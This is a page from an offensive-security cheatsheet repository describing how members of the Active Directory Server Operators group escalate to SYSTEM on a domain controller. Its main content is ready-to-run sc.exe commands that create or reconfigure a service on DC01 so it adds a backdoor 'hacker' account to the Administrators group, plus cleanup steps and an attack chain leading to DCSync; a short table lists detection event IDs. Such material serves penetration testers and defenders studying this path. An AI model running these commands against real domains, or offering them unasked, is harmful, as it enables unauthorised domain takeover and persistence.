daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-51-abusing-server-operators-group.md (2765B)


      1 ---
      2 title: "Attack #51 โ€” Abusing Server Operators Group"
      3 description: "sc.exe \\\\DC01 create evilsvc binPath= \"cmd.exe /c net user hacker P@ss123! /add && net localgroup Administrators hacker /add\" start= auto sc.exe \\\\DC01โ€ฆ"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory", "adcs"]
      7 tools: ["PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ŸŸฃ Attack #51 โ€” Abusing Server Operators Group.md"
     11 ---
     12 # ๐ŸŸฃ Attack #51 โ€” Abusing Server Operators Group
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 **Server Operators** can log on to Domain Controllers, start/stop services, manage shared resources, and backup/restore files. The critical escalation path: Server Operators can **modify and create Windows services** โ€” allowing them to create a malicious service that runs as SYSTEM, achieving SYSTEM-level access on a DC.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Membership in Server Operators** | Can manage services on DCs |
     27 
     28 ***
     29 
     30 ## ๐Ÿ’ป Full Commands
     31 
     32 ```powershell
     33 # โ”€โ”€ Create a malicious service โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     34 sc.exe \\DC01 create evilsvc binPath= "cmd.exe /c net user hacker P@ss123! /add && net localgroup Administrators hacker /add" start= auto
     35 sc.exe \\DC01 start evilsvc
     36 
     37 # โ”€โ”€ Or modify an existing service โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     38 # Find a stoppable service:
     39 sc.exe \\DC01 query type=own | findstr SERVICE_NAME
     40 sc.exe \\DC01 config VSS binPath= "cmd.exe /c net localgroup Administrators low_user /add"
     41 sc.exe \\DC01 stop VSS
     42 sc.exe \\DC01 start VSS
     43 
     44 # โ”€โ”€ Cleanup โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     45 sc.exe \\DC01 delete evilsvc
     46 # Or restore the original binPath
     47 ```
     48 
     49 ***
     50 
     51 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     52 
     53 | Event ID | Source | What to Look For |
     54 |---|---|---|
     55 | **7045** | System Log (DC) | New service installed with suspicious binPath |
     56 | **4697** | Security Log (DC) | Service installation |
     57 | **4688** | Security Log (DC) | Process creation from service |
     58 
     59 ***
     60 
     61 ## ๐Ÿ”— Attack Chain Context
     62 
     63 ```
     64 [Server Operators] โ”€โ”€โ†’ Service manipulation โ†’ SYSTEM on DC
     65          โ”‚
     66          โ”œโ”€โ”€โ†’ ๐Ÿ”— Create/modify service โ†’ run as SYSTEM โ†’ DCSync
     67          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: empty Server Operators group, monitor 7045
     68 ```
     69 
     70 ***
     71 
     72 > โœ… **Attack #51 โ€” Server Operators complete.**